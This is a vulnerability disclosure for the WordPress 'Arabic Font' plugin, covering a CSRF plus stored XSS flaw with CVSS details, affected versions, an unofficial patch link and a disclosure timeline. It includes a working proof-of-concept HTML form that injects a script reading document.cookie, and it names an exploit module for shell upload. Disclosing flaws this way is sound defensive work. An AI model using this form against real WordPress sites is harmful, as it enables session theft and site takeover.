Homepage

https://wordpress.org/plugins/arabic-font/

Overview

Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.

CVSS Score

5.2

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:W/RC:C)

Versions Affected

1.2 and below

Solution

There is no official update to resolve this, but an unofficial patch has been included in this disclosure.

Unofficial Patch

The patched plugin can be found here: https://static.rastating.com/patches/arabic-font/arabic-font.zip

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">  
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>  

WordPress Exploit Framework Module

exploit/arabic_font_csrf_stored_xss_shell_upload

WPVDB-ID

8868

Disclosure Timeline

  • 2017-07-18: Initial discovery
  • 2017-07-18: Contacted vendor with proof of concept and details of the vulnerabilities
  • 2017-07-20: Contacted WordPress to report vulnerability
  • 2017-07-20: Plugin removed from WordPress repository
  • 2017-07-20: Developed an unofficial patch in lieu of the vendor producing one
  • 2017-07-20: Released public disclosure